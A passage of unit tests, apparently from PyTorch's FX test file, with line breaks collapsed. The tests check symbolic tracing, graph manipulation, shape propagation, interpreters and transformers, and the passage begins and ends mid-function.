test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_layout(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x): return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0) traced = symbolic_trace(M()) x = torch.rand(5, 9, 3, 4) self.assertEqual(traced(x), torch.zeros_like(x)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_prepend_self(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.prepend(b) x.append(b) self.assertEqual(len(graph.nodes), 3) def test_erase_node_error(self): st = SimpleTest() traced = symbolic_trace(st) for node in traced.graph.nodes: # Test deleting with uses both in another Node and at the output if node.target in [operator.add, torch.relu]: with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'): traced.graph.erase_node(node) def test_copy_it(self): d = immutable_dict([(3, 4), (5, 6)]) l = immutable_list([(3, 4), (5, 6)]) self.assertEqual(d, deepcopy(d)) self.assertEqual(l, deepcopy(l)) def test_get_torch_func_signature(self): for key in dir(torch): obj = getattr(torch, key) if callable(obj): schemas = get_signature_for_torch_op(obj) def test_find_uses(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) y = torch.relu(x) z = x + x u = torch.neg(x) graph.output((y + z + u).node) graph.lint() users_of_x = x.node.users self.assertEqual(len(users_of_x), 3) expected_ops = set(['relu', 'add', 'neg']) for use in users_of_x: assert any(use.name.startswith(prefix) for prefix in expected_ops) def test_inline_graph(self): class InlineInto(torch.nn.Module): def forward(self, x): return torch.relu(x) class ToInline(torch.nn.Module): def forward(self, x): return torch.neg(x) inline_into = symbolic_trace(InlineInto()) to_inline = symbolic_trace(ToInline()) combined_graph = torch.fx.Graph() output_node = combined_graph.graph_copy(inline_into.graph, {}) input_node = list(to_inline.graph.nodes)[0] assert input_node and input_node.op == 'placeholder' val_map = {input_node : output_node} output = combined_graph.graph_copy(to_inline.graph, val_map) combined_graph.output(output) combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph) input = torch.rand(3, 4) self.assertEqual(combined_module(input), input.relu().neg()) def test_multi_insert_point(self): graph = torch.fx.Graph() x = torch.fx.Proxy(graph.placeholder('x')) relu = torch.relu(x) with graph.inserting_before(relu.node): y = torch.neg(x) z = torch.tanh(y) graph.output((relu.node, z.node)) graph.lint() expected_ops = ['x', 'neg', 'tanh', 'relu'] for node, expected in zip(graph.nodes, expected_ops): assert expected in node.name def test_reassign_args_kwargs_uses(self): graph = torch.fx.Graph() x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y')) z = x + y zed = z + z + z graph.output(zed.node) graph.lint() # zed = z + z + z -> zed = z + z + x zed.node.args = (zed.node.args[0], x.node) self.assertEqual(x.node.users.keys(), [z.node, zed.node]) # z = x + y -> z = y + y z.node.args = (y.node, y.node) self.assertEqual(x.node.users.keys(), [zed.node]) def test_trace_function(self): def foo(x, y): return torch.relu(x) + y x, y = torch.randn(3, 4), torch.randn(3, 4) self.checkGraphModule(foo, (x, y)) def test_trace_dict_int_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ ["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def 